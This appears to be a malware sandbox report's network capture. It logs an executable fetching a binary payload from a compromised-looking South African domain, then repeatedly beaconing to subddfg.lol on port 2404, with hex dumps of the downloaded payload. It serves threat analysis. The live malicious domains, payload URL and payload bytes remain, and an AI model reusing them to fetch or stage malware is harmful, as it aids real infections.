                                                Jan 10, 2025 20:38:49.531923056 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.613042116 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.613070011 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.613173008 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.613173008 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.613183022 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.613221884 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.752898932 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.752926111 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753011942 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753011942 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753027916 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753103018 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753120899 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753184080 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753184080 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753191948 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753236055 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753408909 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753526926 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753540993 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753591061 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753607035 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753670931 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753909111 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753926992 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.753983021 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.753988028 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754065990 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754102945 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754122019 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754169941 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754169941 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754178047 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754213095 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754529953 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754545927 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754648924 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754656076 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754740953 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.754880905 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.754894018 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.755043030 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.755050898 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.755158901 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.757627010 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.757663965 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.757739067 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.757745981 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.757769108 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.757816076 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.839873075 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.839903116 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.839967966 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.839987993 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840025902 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840025902 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840043068 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840061903 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840115070 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840120077 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840245008 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840306997 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840523005 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840569019 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840596914 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840612888 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840692043 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840692043 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840820074 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840859890 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840917110 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840917110 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.840923071 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.840996027 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841067076 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841111898 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841171026 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841171026 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841176033 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841278076 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841629982 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841674089 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841698885 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841716051 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.841727972 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.841751099 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.979605913 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.979636908 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.979753017 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.979753017 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.979773998 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.979938030 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.979960918 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.979990005 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.979990005 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.979996920 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980046034 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980046034 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980290890 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980314016 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980525017 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980564117 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980564117 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980571985 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980585098 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.980695009 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980695963 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.980726004 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:53.310959101 CET497372404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:38:53.315802097 CET24044973794.156.177.164192.168.2.4
                                                Jan 10, 2025 20:38:53.315892935 CET497372404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:38:53.319679022 CET497372404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:38:53.324491024 CET24044973794.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:14.698304892 CET24044973794.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:14.698395967 CET497372404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:14.698465109 CET497372404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:14.703330040 CET24044973794.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:15.707643032 CET497382404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:15.712723970 CET24044973894.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:15.712795019 CET497382404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:15.717329025 CET497382404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:15.722161055 CET24044973894.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:37.086087942 CET24044973894.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:37.086201906 CET497382404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:37.086276054 CET497382404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:37.091007948 CET24044973894.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:38.095968962 CET498262404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:38.100869894 CET24044982694.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:38.100960970 CET498262404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:38.104454041 CET498262404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:38.109217882 CET24044982694.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:59.512006998 CET24044982694.156.177.164192.168.2.4
                                                Jan 10, 2025 20:39:59.513566971 CET498262404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:59.513643026 CET498262404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:39:59.518503904 CET24044982694.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:00.517664909 CET499552404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:00.522469044 CET24044995594.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:00.522744894 CET499552404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:00.526304960 CET499552404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:00.531078100 CET24044995594.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:21.907896996 CET24044995594.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:21.908011913 CET499552404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:21.908080101 CET499552404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:21.912893057 CET24044995594.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:22.924810886 CET500092404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:22.929706097 CET24045000994.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:22.933455944 CET500092404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:22.936878920 CET500092404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:22.941657066 CET24045000994.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:44.293200970 CET24045000994.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:44.295391083 CET500092404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:44.295488119 CET500092404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:44.300246954 CET24045000994.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:45.299139023 CET500102404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:45.304045916 CET24045001094.156.177.164192.168.2.4
                                                Jan 10, 2025 20:40:45.304120064 CET500102404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:45.308459044 CET500102404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:40:45.313293934 CET24045001094.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:06.684071064 CET24045001094.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:06.685480118 CET500102404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:06.685673952 CET500102404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:06.692708015 CET24045001094.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:07.689492941 CET500112404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:07.694324970 CET24045001194.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:07.695377111 CET500112404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:07.698569059 CET500112404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:07.703351974 CET24045001194.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:29.092255116 CET24045001194.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:29.092443943 CET500112404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:29.092443943 CET500112404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:29.097373962 CET24045001194.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:30.096151114 CET500122404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:30.101115942 CET24045001294.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:30.105283976 CET500122404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:30.110301971 CET500122404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:30.115065098 CET24045001294.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:51.467885971 CET24045001294.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:51.468056917 CET500122404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:51.468117952 CET500122404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:51.473028898 CET24045001294.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:52.470556021 CET500132404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:52.475625038 CET24045001394.156.177.164192.168.2.4
                                                Jan 10, 2025 20:41:52.475712061 CET500132404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:52.479090929 CET500132404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:41:52.483899117 CET24045001394.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:13.857531071 CET24045001394.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:13.857615948 CET500132404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:42:13.857645035 CET500132404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:42:13.862519026 CET24045001394.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:14.861068010 CET500142404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:42:14.866482973 CET24045001494.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:14.867399931 CET500142404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:42:14.870722055 CET500142404192.168.2.494.156.177.164
                                                Jan 10, 2025 20:42:14.875561953 CET24045001494.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:36.233961105 CET24045001494.156.177.164192.168.2.4
                                                Jan 10, 2025 20:42:36.234204054 CET500142404192.168.2.494.156.177.164
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 20:38:46.724633932 CET6552353192.168.2.41.1.1.1
                                                Jan 10, 2025 20:38:47.147964001 CET53655231.1.1.1192.168.2.4
                                                Jan 10, 2025 20:38:53.297907114 CET5926353192.168.2.41.1.1.1
                                                Jan 10, 2025 20:38:53.310004950 CET53592631.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 10, 2025 20:38:46.724633932 CET192.168.2.41.1.1.10x8415Standard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                Jan 10, 2025 20:38:53.297907114 CET192.168.2.41.1.1.10xffdeStandard query (0)subddfg.lolA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 10, 2025 20:38:47.147964001 CET1.1.1.1192.168.2.40x8415No error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 20:38:47.147964001 CET1.1.1.1192.168.2.40x8415No error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                Jan 10, 2025 20:38:53.310004950 CET1.1.1.1192.168.2.40xffdeNo error (0)subddfg.lol94.156.177.164A (IP address)IN (0x0001)false
                                                • www.healthselflesssupplies.co.za
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449736164.160.91.32443180C:\Users\user\Desktop\IpykYx5iwz.exe
                                                TimestampBytes transferredDirectionData
                                                2025-01-10 19:38:48 UTC193OUTGET /gmjzqcQFfx21.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: www.healthselflesssupplies.co.za
                                                Cache-Control: no-cache
                                                2025-01-10 19:38:48 UTC404INHTTP/1.1 200 OK
                                                Connection: close
                                                content-type: application/octet-stream
                                                last-modified: Thu, 12 Dec 2024 05:42:22 GMT
                                                accept-ranges: bytes
                                                content-length: 493120
                                                date: Fri, 10 Jan 2025 19:38:48 GMT
                                                server: LiteSpeed
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                2025-01-10 19:38:48 UTC964INData Raw: c8 f3 2e eb 7c f5 36 f1 ae a0 30 ed 58 9a 1f a1 4a aa 9d 4c c5 be 96 c5 2d 2b 24 a3 4f 4e f5 aa e0 80 80 7b 9e e4 58 1f de 86 b8 31 84 30 1b 6d 67 a5 a7 27 73 79 66 1d bc 44 56 1d b4 0e d0 46 1c 5e f4 d6 f6 10 57 02 15 b4 cb 19 e6 8f fe e9 25 e6 d6 9a fe 5f 36 49 c3 9e 56 06 55 e7 b9 b8 76 26 92 78 cd dd d5 9e 71 63 6b 0f 2b 2d a5 67 f0 5b 6b 6a 7a e5 ff 4c ae b5 2d 36 82 23 2e 6a e4 4a 07 b3 8c 16 cf 99 e6 4a d1 69 dd ed 59 9c 5e 96 c9 16 77 e1 82 55 b4 44 d3 8d c1 09 b1 a3 14 fd af e5 2f 24 ea 65 15 8b 36 46 de 09 82 1f 01 d1 c8 c3 4f 2f 44 96 f3 ae 69 cb f3 60 76 37 c1 67 ec ea e7 21 8d 38 dc 5a 71 75 3f 05 60 6f e2 82 a6 22 c3 88 98 84 d5 f9 cf 22 e8 72 98 1c fb 4a 9c 0c 8a 6d 40 e2 04 95 f0 bb 7e 27 79 47 24 78 83 77 b1 34 c1 73 9c ee aa 04 a7 3b c6
                                                Data Ascii: .|60XJL-+$ON{X10mg'syfDVF^W%_6IVUv&xqck+-g[kjzL-6#.jJJiY^wUD/$e6FO/Di`v7g!8Zqu?`o""rJm@~'yG$xw4s;
                                                2025-01-10 19:38:49 UTC14994INData Raw: 72 76 6d 6e 39 33 86 b8 1f da d3 d6 3b e9 20 58 68 2d d0 57 9b e8 47 91 0d 8c 74 67 f3 76 cb 61 1d 49 d1 b6 88 95 78 f7 a5 22 e2 0c af da 4b b0 0a 80 8f 8b 83 d6 7b e2 a7 08 72 00 e8 e2 1f 64 ab 0e 2e 8a 43 01 d9 d8 77 94 df f8 e0 7e 09 d3 33 cc 5c d0 31 b9 a5 7c 17 d5 87 75 64 d6 11 39 cb 51 6f 56 c6 f1 07 0d 09 81 8c 80 93 c6 fb 71 36 82 5a 3b 8b 89 b3 be 19 53 cb ce 3c 36 c6 1a fd 2b dc 63 8d 9e e2 d3 cf f2 04 c7 f5 0a 57 65 0d 73 5e c1 38 ad 2e 31 46 82 6c 05 48 60 80 f6 bc c1 dc 79 41 d7 cb 44 ee c5 39 23 d6 1d 64 58 02 11 dc 74 75 5c 70 16 8c b5 e5 d6 c3 3d 35 76 a1 fc b6 55 06 0c 44 29 85 31 26 51 29 9c 35 ef 93 71 63 03 c6 47 68 a5 8f b4 73 68 6a 23 26 95 4c 17 0d 10 71 8a ca 62 5a ea 55 d5 5d e0 e7 c6 bc eb da d3 25 49 0f b4 cc 09 a2 e9 8e 20 81
                                                Data Ascii: rvmn93; Xh-WGtgvaIx"K{rd.Cw~3\1|ud9QoVq6Z;S<6+cWes^8.1FlH`yAD9#dXtu\p=5vUD)1&Q)5qcGhshj#&LqbZU]%I
                                                2025-01-10 19:38:49 UTC16384INData Raw: 9b 22 9f 27 1d a1 97 63 77 6a 90 96 f9 23 e2 8f 6b ea c6 fc 2e a0 67 32 57 29 84 24 a2 2c 34 47 e8 e2 26 59 b7 48 69 8a 37 4f 59 e5 52 d2 98 f8 e0 0a 4c 5e 77 e8 4c 80 ce ac 79 0e 52 d5 04 99 7c 5b 5d 1d f3 da b8 dd 32 19 e5 6f 08 81 dc 0b 46 4d 35 99 06 80 5a 3b 08 65 a7 35 d5 3b 9f 9a c3 56 13 b4 29 3c 6b 85 89 c2 8b 78 20 73 34 a2 28 06 74 8d 08 64 18 46 86 cf 0e 9f 8b 8d 6c b5 21 13 e9 96 fa 6e a7 50 cb ea 8e c1 10 51 ef 66 e4 35 4f 09 5f 92 70 e7 db 1d 70 a8 62 6c 66 a8 c6 fe 2b 6b c9 ff ba 5e 06 20 c1 3a 54 6e ad 5e 10 21 89 93 9e 99 f5 bf f0 d4 ae 49 7f 7b 97 03 7a 2f a3 ff a4 29 61 d2 c9 62 80 75 6b ea d6 79 8d bf 62 96 04 97 a2 2f 30 c8 be 48 f4 c8 93 89 ef 43 ea 1a 32 31 5b b6 ee ca 98 20 ba 04 22 d8 6c 7d 13 9f f4 43 86 a7 73 62 34 94 3f dc bf
                                                Data Ascii: "'cwj#k.g2W)$,4G&YHi7OYRL^wLyR|[]2oFM5Z;e5;V)<kx s4(tdFl!nPQf5O_ppblf+k^ :Tn^!I{z/)abukyb/0HC21[ "l}Csb4?
                                                2025-01-10 19:38:49 UTC16384INData Raw: df 07 8e c6 aa c3 9c cb 70 9e 79 53 89 bd 1f 0e a5 75 41 b8 c0 00 e5 4a 01 c1 5c b1 3f a3 c7 63 5a b4 cd 54 d0 82 92 fd 82 b4 ec b0 db 57 57 4f 74 2d ef c5 a3 48 40 89 4e 3e b2 79 cf aa d8 bd ed cf b2 a6 c6 5b e8 ae d7 78 49 04 8f a6 32 fd 88 d9 64 cb ec 2d 9c de 92 07 aa 90 e1 df cf 2c be 80 31 f1 61 3a d9 97 54 25 79 32 9b ed ef a9 da 01 1a 34 b1 13 dc 86 67 00 78 60 02 76 7d d8 0f 28 f3 e6 e5 c7 77 4d 0c 17 96 f9 73 03 49 37 28 e5 51 9c ad 52 e3 e3 5e 51 bc e4 b1 02 14 5d 89 b3 6a 51 df a4 28 68 9f 8e 8d fc 92 b0 83 18 0a cf 08 ea 4f ec 9b e4 cc 69 1b 28 07 6d 53 2d 1b 70 59 b4 be 45 c0 0d 9f 99 13 ee 5c ed 2c 37 b8 5a 95 96 71 82 72 9a 50 f7 28 01 f4 8f c2 9e 19 50 0f bf 48 24 d6 ed bd 85 22 ba be 3d 7e 59 3f 48 b3 24 bb 8f de 66 35 2a 46 74 62 08 79
                                                Data Ascii: pySuAJ\?cZTWWOt-H@N>y[xI2d-,1a:T%y24gx`v}(wMsI7(QR^Q]jQ(hOi(mS-pYE\,7ZqrP(PH$"=~Y?H$f5*Ftby
                                                2025-01-10 19:38:49 UTC16384INData Raw: cc 2c 12 50 6e cf d1 26 07 34 ec 2d b7 27 93 76 f6 7a 9b 39 d3 f5 46 ed 26 16 b4 58 d6 9f b8 05 6f 7e 20 d2 da e5 98 30 5b a1 eb d3 de da 31 cb 31 27 11 58 e6 93 3d 17 81 cd 3a ca 39 01 47 c0 69 e0 e0 32 1a 4e d5 e5 ca 18 53 2f af 0e 06 d4 2c dc a1 29 a0 03 34 b1 9d 62 08 42 47 1d 5a 7c 0c bf 48 04 08 b7 1c f5 01 39 df e0 bf 17 00 a7 ea 8d 97 77 26 28 a3 38 cd 28 4d 7a af e4 ea fb cd 41 94 a7 48 a8 fc f8 eb 50 1c bf e9 70 aa 31 c4 53 fe a5 27 6f 83 94 34 35 be 52 f2 f7 79 c7 de ba f3 2a 12 d0 a1 75 8c 78 69 88 4b 25 07 9b 01 06 e7 d7 d0 66 f5 d1 ae 9c 41 d8 37 50 c3 47 e7 62 2e 10 77 0d c4 7c b6 97 1a 0c 6a 9e d8 5d f3 2a 61 41 69 1a 51 4b 42 97 2a 1b 5a 1b fd d8 23 b5 40 22 95 aa 2d a7 39 59 ee 49 ab 44 1c 22 b4 e4 2e 4f 7f a0 f9 01 00 61 1e 64 06 4a 7d
                                                Data Ascii: ,Pn&4-'vz9F&Xo~ 0[11'X=:9Gi2NS/,)4bBGZ|H9w&(8(MzAHPp1S'o45Ry*uxiK%fA7PGb.w|j]*aAiQKB*Z#@"-9YID".OadJ}
                                                2025-01-10 19:38:49 UTC16384INData Raw: 85 69 1c 1b 5a 82 1f f1 a9 1c 4c 39 5b 57 70 d5 cc c7 25 73 02 53 76 b6 b2 64 12 fe 11 5d 8d 16 b9 f5 a6 e3 b2 59 50 08 c0 fc 2e a4 0c 4f 8f 5f 7a 67 67 7c 6c 8b bc c6 0b e7 69 0a ad 4b 47 88 95 fc 6f 1f 93 dc f0 f7 5d f7 27 47 5e 55 f1 cc 1a 97 15 e6 78 f0 9b a2 0a ba 08 45 05 42 4b b2 f7 5d f6 d5 a8 a4 18 aa df 61 b3 42 55 bf bb 76 4c 41 f2 79 34 b8 b1 03 04 0b d1 9a cd 07 f2 61 9f ac d3 f2 04 c4 73 dd 22 51 01 4f b1 95 5c b3 44 d7 27 8f 06 7b df c0 38 c3 f9 29 94 ae 19 5c 55 d8 09 0c 87 a0 c6 36 ef 23 26 01 4b bf 3d 09 8f 8a cd 8d 19 a2 be ee a0 23 95 f3 db 56 c5 aa 93 9d b4 89 52 b6 74 32 a9 f1 92 8e 76 b3 7f 6e 2d 66 98 84 7f 6f 95 6f 05 8f 09 ae 76 d2 42 ae 2a d1 1e ce 5d 42 a8 3c d0 83 54 04 0d a4 01 14 33 18 04 47 a0 e9 a5 86 62 fd cf d1 29 f3 ee
                                                Data Ascii: iZL9[Wp%sSvd]YP.O_zgg|liKGo]'G^UxEBK]aBUvLAy4as"QO\D'{8)\U6#&K=#VRt2vn-foovB*]B<T3Gb)
                                                2025-01-10 19:38:49 UTC16384INData Raw: 9e 3d f5 8d e0 2d f1 cc 62 5a 5f a4 6d 05 6e 3b 48 36 d9 eb 0a 24 c8 e7 30 5c de 85 f9 40 30 9e 79 30 d7 e4 ac 65 c0 47 61 bd c0 7c f3 16 da bb f5 3f b2 3f b0 d9 75 0c d8 cd 0e 95 d7 77 06 4e 98 b7 be 9f 4f e1 06 ed 42 41 dd b0 bf 61 6e 1d c1 c3 8a 77 01 0a 32 d8 f6 d6 12 a5 e8 14 a5 72 4c cb fd 03 9a c1 d6 2e e9 46 4b 13 6f ac ff 9a 82 91 e1 02 2a a0 1e 39 ce 94 62 e6 aa 25 4d 40 6a 31 9b ed 5e 69 c6 17 9e 2a c3 30 75 86 8d 4c 4a f1 fc 02 08 1c d2 28 1f 78 8f d0 6e df 9b 73 5e 47 8c fd b4 5c d1 06 24 af 64 a2 ab e2 5e 3c ce 04 5c 7d 43 90 1f 3f 82 fa 12 52 28 33 92 63 02 5c 2a 4f 44 dd eb 8f 49 ad 4f 84 e7 31 33 91 d6 2a db 6c e2 73 e4 8f 3c 13 4b 46 c0 71 23 d6 67 37 a8 d3 d0 71 3d 72 fe c6 78 7c f1 76 c3 09 00 e9 da da f0 8d a6 fa ce d1 c5 89 a6 3d 76
                                                Data Ascii: =-bZ_mn;H6$0\@0y0eGa|??uwNOBAanw2rL.FKo*9b%M@j1^i*0uLJ(xns^G\$d^<\}C?R(3c\*ODIO13*ls<KFq#g7q=rx|v=v
